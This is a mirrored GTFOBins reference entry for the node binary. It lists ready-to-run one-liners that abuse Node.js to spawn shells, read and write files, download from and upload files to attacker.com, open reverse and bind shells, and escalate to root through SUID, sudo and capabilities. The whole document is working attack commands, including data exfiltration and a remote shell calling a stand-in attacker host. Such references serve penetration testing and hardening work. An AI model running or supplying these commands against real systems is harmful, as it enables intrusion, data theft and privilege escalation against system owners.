mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-10-22 16:48:09 +02:00
53 lines
1.9 KiB
Markdown
53 lines
1.9 KiB
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
|
|
file-write:
|
|
- code: node -e 'fs.writeFileSync("file_to_write", "DATA")'
|
|
file-read:
|
|
- code: node -e 'process.stdout.write(fs.readFileSync("/bin/ls"))'
|
|
file-download:
|
|
- description: Fetch a remote file via HTTP GET request.
|
|
code: |
|
|
export URL=http://attacker.com/file_to_get
|
|
export LFILE=file_to_save
|
|
node -e 'http.get(process.env.URL, res => res.pipe(fs.createWriteStream(process.env.LFILE)))'
|
|
file-upload:
|
|
- description: Send a local file via HTTP POST request.
|
|
code: |
|
|
export URL=http://attacker.com
|
|
export LFILE=file_to_send
|
|
node -e 'fs.createReadStream(process.env.LFILE).pipe(http.request(process.env.URL))'
|
|
reverse-shell:
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
|
code: |
|
|
export RHOST=attacker.com
|
|
export RPORT=12345
|
|
node -e 'sh = child_process.spawn("/bin/sh");
|
|
net.connect(process.env.RPORT, process.env.RHOST, function () {
|
|
this.pipe(sh.stdin);
|
|
sh.stdout.pipe(this);
|
|
sh.stderr.pipe(this);
|
|
})'
|
|
bind-shell:
|
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
|
code: |
|
|
export LPORT=12345
|
|
node -e 'sh = child_process.spawn("/bin/sh");
|
|
net.createServer(function (client) {
|
|
client.pipe(sh.stdin);
|
|
sh.stdout.pipe(client);
|
|
sh.stderr.pipe(client);
|
|
}).listen(process.env.LPORT)'
|
|
suid:
|
|
- code: |
|
|
./node -e 'child_process.spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'
|
|
sudo:
|
|
- code: |
|
|
sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
|
|
capabilities:
|
|
- code: |
|
|
./node -e 'process.setuid(0); child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
|
|
---
|